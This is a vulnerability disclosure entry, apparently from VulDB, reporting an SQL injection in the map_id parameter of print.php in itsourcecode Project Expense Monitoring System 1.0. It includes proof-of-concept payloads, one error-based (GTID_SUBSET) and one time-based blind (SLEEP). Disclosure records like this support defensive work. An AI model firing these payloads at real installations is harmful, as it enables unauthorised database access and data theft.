| 제목 | itsourcecode Project Expense Monitoring System v1.0 SQLi |
|---|
| 설명 | Constructing a special SQL statement in the print.php page and passing it in the map_id parameter can lead to a SQL injection vulnerability.
POC:
Parameter: map_id (GET)
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: map_id=67' AND GTID_SUBSET(CONCAT(0x7162627a71,(SELECT (ELT(5075=5075,1))),0x716b717671),5075)-- xGVQ
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: map_id=67' AND (SELECT 2049 FROM (SELECT(SLEEP(5)))IStZ)-- PtEB |
|---|
| 원천 | ⚠️ https://github.com/DeepMountains/zzz/blob/main/CVE3-3.md |
|---|
| 사용자 | GUOTINGTING (UID 73614) |
|---|
| 제출 | 2024. 08. 17. PM 02:15 (2 연령 ago) |
|---|
| 모더레이션 | 2024. 08. 19. PM 04:12 (2 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 275120 [itsourcecode Project Expense Monitoring System 1.0 print.php map_id SQL 주입] |
|---|
| 포인트들 | 20 |
|---|